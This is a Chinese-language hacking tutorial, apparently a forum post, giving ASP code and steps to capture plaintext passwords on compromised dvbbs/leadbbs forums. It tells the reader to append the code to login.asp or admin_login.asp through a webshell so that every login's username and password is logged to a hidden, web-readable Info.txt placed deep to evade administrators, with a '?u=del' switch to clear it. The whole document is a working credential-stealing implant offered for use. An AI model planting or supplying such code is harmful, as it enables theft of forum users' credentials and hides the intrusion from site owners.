用asp記錄論壇使用者密碼(dvbbs,leadbbs等)

很多人在得到動網的資料庫後鬱悶不已 (呀的，管理員的變態密碼讓我們的機器跑砸了都沒轍)

Now We Have Another Method!!!!! 這就是用asp記錄純文字密碼。

用法：1.將此代碼插入login.asp或admin_login.asp等等驗證登陸的檔案末尾即可。

2.將PATH換成web下可訪問的路徑,如:C:\Inetpub\wwwroot\...\Info.txt（info.txt的路徑越深越好，防止admin發現)

3.你的webshell必須有許可權修改檔案且FileSystemObject可用。

4.一段時間後在IE上訪問:http://.../Info.txt就 可以看到登入過的使用者的帳號密碼。

5.在IE上輸http://.../(which your modified).asp?u=del可一清楚info.txt的內容。

注意：1.你可以為它添加其他功能，例如：已記錄的使用者不再重複記錄，用郵件接收密碼等等。

2.為了防止info.txt過大，我用清空info.txt的方法。

當然你可以建立檔案來解決此問題。

if filesize>200000 then

set file2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine ""

file2.close

end if

--------------------------------------------------------------------

<%

dim fso

dim file

dim file2

dim filesize

dim file3

set fso=server.createobject("Scripting.FileSystemObject")

If Request("u")="del" Then

set file=fso.OpenTextFile(PATH,2,True)

file.WriteLine ""

End If

If fso.FileExists("PATH") Then

set file=fso.OpenTextFile(PATH,8,True)

Else

set file=fso.CreateTextFile(PATH)

end if

file.WriteLine "Username:"+Request.form("Username")

file.WriteLine "Password:"+Request.form("password")

file.close

set file3=fso.GetFile(PATH)

filesize=file3.size

if filesize>200000 then

set file2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine ""

file2.close

end if

set file=nothing

set file2=nothing

set filesize=nothing

set fso=nothing

%>

----------------------------------------------------------------------

By ymqsz

E-mail:ymqsz@tom.com